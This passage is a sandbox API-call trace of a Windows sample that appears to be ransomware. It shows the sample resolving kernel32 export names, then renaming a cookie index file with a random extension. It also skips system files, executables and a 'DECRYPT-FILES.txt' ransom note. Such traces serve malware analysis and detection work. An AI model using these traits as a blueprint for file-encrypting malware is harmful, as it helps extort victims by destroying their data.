lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.743] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.743] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.743] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.743] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.743] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.743] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.743] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.743] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.743] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.744] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.744] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.744] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.744] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.744] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.744] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.744] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.744] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.744] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.744] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.744] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.744] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.744] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.745] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.745] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.745] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.745] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.745] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.745] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.745] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.745] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.745] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.745] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.745] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.745] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.745] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.745] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.745] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.745] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.745] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.745] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.745] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.746] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.746] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.746] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.746] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.746] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.746] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.746] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.746] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.746] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.746] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.746] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.746] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.746] lstrlenA (lpString="DELETEATOM") returned 10 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.746] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.746] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.746] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.746] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.746] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.746] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.746] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.747] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.747] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.747] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.747] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.747] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.747] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.747] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.747] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.747] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.747] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.747] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.747] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.747] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.747] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.747] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.747] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.747] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.747] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.747] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.748] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.748] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.748] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.748] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.748] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.748] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.748] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.748] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.748] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.748] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.748] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.748] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.748] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.748] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.748] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.748] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.748] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.749] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.749] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat") returned 85 [0079.749] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat.Qb6J") returned 90 [0079.749] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat.Qb6J" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat.qb6j"), dwFlags=0x0) returned 1 [0079.749] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.750] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.750] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.750] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab4b5ec0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab4b5ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab4b5ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.750] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.750] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.750] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.750] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.751] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.751] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.751] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.751] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.751] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.751] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\jkbimi8.tmp" [0079.751] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.751] CloseHandle (hObject=0x0) returned 0 [0079.751] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.751] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab4b5ec0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab4b5ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab4b5ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0079.751] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0079.752] CloseHandle (hObject=0x458) returned 1 [0079.752] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52878dd0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0079.752] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0079.752] CloseHandle (hObject=0x450) returned 1 [0079.752] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab22e760, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab22e760, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab2548c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, 